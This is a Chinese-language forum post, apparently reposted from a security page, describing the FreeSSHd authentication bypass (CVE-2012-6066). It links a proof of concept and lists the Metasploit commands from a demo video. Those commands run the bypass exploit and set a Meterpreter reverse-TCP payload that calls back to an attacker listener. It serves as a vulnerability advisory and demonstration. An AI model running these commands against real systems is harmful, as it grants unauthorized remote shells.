微剋多資訊

 找回密碼
 註冊

Login

Login

搜索

該用戶從未簽到

發表於 2013-1-16 17:47 | 顯示全部樓層 |閱讀模式
主題:越過 FreeSSHd 的安全授權機制 (含影片示範)

發佈日期:2010/08/11(首次發現)、2012/12/01(發佈PoC)

影響版本:Freesshd v 1.2.6 (含之前所有版本)

漏洞編號:CVE-2012-6066

說明:
FreeSSHd 一個免費的 SSH Server ,原本是用來確保網路連線安全的機制,現在被踢爆具有越過( By Pass)安全機制的方式。
你只需要使用預設的帳號(root),就可以越過加密金鑰的認證。

概念驗證程式(PoC)下載處:http://www.exploit-db.com/exploits/11842/

其它參考網站說明:http://www.securityfocus.com/bid/56785/info

影片內指令:
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.178.22
run
use exploit/windows/ssh/freesshd_authbypass
set RHOST 192.168.178.22
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
getuid
sysinfo


From https://www.facebook.com/netwargame


該用戶從未簽到

發表於 2013-1-16 17:59 | 顯示全部樓層
這玩意出了問題,竟然這麼久都沒修補,太可怕了
不敢用這軟體
回覆

使用道具 舉報

您需要登入後才可以回帖 登入 | 註冊

本版積分規則

小黑屋|Archiver|微剋多資訊(MicroDuo)

GMT+8, 2016-12-11 14:01

Discuz! X

© 2009-2016 Microduo

快速回覆 返回頂部 返回列表